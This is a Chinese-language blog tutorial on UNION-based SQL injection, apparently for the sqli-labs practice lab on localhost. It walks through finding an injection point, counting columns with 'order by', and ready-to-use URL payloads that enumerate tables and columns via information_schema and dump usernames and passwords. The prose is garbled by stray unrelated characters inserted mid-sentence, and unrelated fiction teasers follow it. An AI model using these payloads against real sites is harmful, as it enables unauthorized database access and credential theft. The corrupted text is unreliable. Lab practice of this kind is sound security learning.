2022-06-13union 聯(lián)合查詢 sql注入

最基礎的sql注入查詢語句鸦做,union select 聯(lián)合查詢注入

1、找頁面可能存在的注入點的位置

????????????看頁面url地址是否有后臺傳參動作? --->? 潭流?

????????????構造傳參值? ? ? ? ? ? -->? ?id=xx

????????????驗證輸入自己構造的傳參值后吗伤,后臺是否能夠解析

2、確認頁面是否有回顯值

url/index.php?id=-50

????????and 1=1 判斷頁面是否正常

????????and 1=2 判斷頁面是否部份報錯

3弓乙、添加語句order by

目的:確定當前頁面的回顯位數(shù)。

url/index.php?id=-50 order by (值)

找到報錯和不報錯的臨界點钧惧,取不報錯的最大值

4暇韧、開始進行聯(lián)合查詢

url/index.php?id=-50 union select 1,2,3,4,5 --+

(匹配order by 驗證出來的值)

????確定當前頁面的顯示位為5,隨后通過查看頁面的回顯值來確定具體哪位是可控的回顯點浓瞪。

5懈玻、可以判斷當前url地址為注入點

????在占位符位置上,構造我們想要的攻擊代碼乾颁,想要查看的結果會出現(xiàn)在占位符的位置上涂乌。

????? ? database()? 查看當前頁面使用的數(shù)據(jù)庫

????????user() 查看當前登錄數(shù)據(jù)庫的用戶

????????@@version 查看當前數(shù)據(jù)庫版本

????????@@basedir 查看路徑

6艺栈、爆庫

http://localhost/sql/Less-1/index.php?id=-1' UNION SELECT 1,database(),3--+


7、爆表以及列(mysql版本需在5.5以下)

http://localhost/sql/Less-1/index.php?id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security') --+


http://localhost/sql/Less-1/index.php?id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users') --+


8湾盒、爆數(shù)據(jù)

http://localhost/sql/Less-1/index.php?id=-1' union select 1,2,(select group_concat(concat(username,'%20',password)) from users) --+


?著作權歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末湿右,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子罚勾,更是在濱河造成了極大的恐慌毅人,老刑警劉巖,帶你破解...
    沈念sama閱讀 216,544評論 6 501
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件荧库,死亡現(xiàn)場離奇詭異堰塌,居然都是意外死亡,警方通過查閱死者的電腦和手機分衫,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,430評論 3 392
  • 文/潘曉璐 我一進店門场刑,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人蚪战,你說我怎么就攤上這事牵现。” “怎么了邀桑?”我有些...
    開封第一講書人閱讀 162,764評論 0 353
  • 文/不壞的土叔 我叫張陵瞎疼,是天一觀的道長。 經(jīng)常有香客問我壁畸,道長贼急,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 58,193評論 1 292
  • 正文 為了忘掉前任捏萍,我火速辦了婚禮太抓,結果婚禮上,老公的妹妹穿的比我還像新娘令杈。我一直安慰自己走敌,他們只是感情好,可當我...
    茶點故事閱讀 67,216評論 6 388
  • 文/花漫 我一把揭開白布逗噩。 她就那樣靜靜地躺著掉丽,像睡著了一般。 火紅的嫁衣襯著肌膚如雪异雁。 梳的紋絲不亂的頭發(fā)上捶障,一...
    開封第一講書人閱讀 51,182評論 1 299
  • 那天,我揣著相機與錄音片迅,去河邊找鬼残邀。 笑死,一個胖子當著我的面吹牛柑蛇,可吹牛的內(nèi)容都是我干的芥挣。 我是一名探鬼主播,決...
    沈念sama閱讀 40,063評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼耻台,長吁一口氣:“原來是場噩夢啊……” “哼空免!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起盆耽,我...
    開封第一講書人閱讀 38,917評論 0 274
  • 序言:老撾萬榮一對情侶失蹤蹋砚,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后摄杂,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體坝咐,經(jīng)...
    沈念sama閱讀 45,329評論 1 310
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,543評論 2 332
  • 正文 我和宋清朗相戀三年析恢,在試婚紗的時候發(fā)現(xiàn)自己被綠了墨坚。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 39,722評論 1 348
  • 序言:一個原本活蹦亂跳的男人離奇死亡映挂,死狀恐怖泽篮,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情柑船,我是刑警寧澤帽撑,帶...
    沈念sama閱讀 35,425評論 5 343
  • 正文 年R本政府宣布凹耙,位于F島的核電站旱幼,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏坐桩。R本人自食惡果不足惜逆巍,卻給世界環(huán)境...
    茶點故事閱讀 41,019評論 3 326
  • 文/蒙蒙 一及塘、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧蒸苇,春花似錦磷蛹、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,671評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至檬嘀,卻和暖如春槽驶,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背鸳兽。 一陣腳步聲響...
    開封第一講書人閱讀 32,825評論 1 269
  • 我被黑心中介騙來泰國打工掂铐, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留,地道東北人。 一個月前我還...
    沈念sama閱讀 47,729評論 2 368
  • 正文 我出身青樓全陨,卻偏偏與公主長得像爆班,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子辱姨,可洞房花燭夜當晚...
    茶點故事閱讀 44,614評論 2 353

推薦閱讀更多精彩內(nèi)容